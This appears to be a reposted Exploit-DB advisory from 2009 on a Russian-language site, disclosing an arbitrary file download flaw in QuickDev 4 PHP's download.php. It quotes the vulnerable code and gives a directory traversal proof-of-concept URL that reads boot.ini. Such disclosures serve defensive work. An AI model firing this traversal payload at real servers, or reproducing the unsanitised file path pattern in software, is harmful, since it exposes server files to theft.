- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9334
- Проверка EDB
-
- Пройдено
- Автор
- SIRGOD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4726
- Дата публикации
- 2009-08-03
Код:
#####################################################################################
[+] QuickDev 4 Php (download.php file) Arbitrary File Download
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#####################################################################################
[+] Download : http://sourceforge.net/projects/quickdev4php/files/
[+] Arbitrary File Download
- Vulnerable code in download.php
--------------------------------------------------------------------------
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
die();
--------------------------------------------------------------------------
- PoC
http://127.0.0.1/download.php?file=../../../../../../boot.ini
#####################################################################################
# milw0rm.com [2009-08-03]- Источник
- www.exploit-db.com
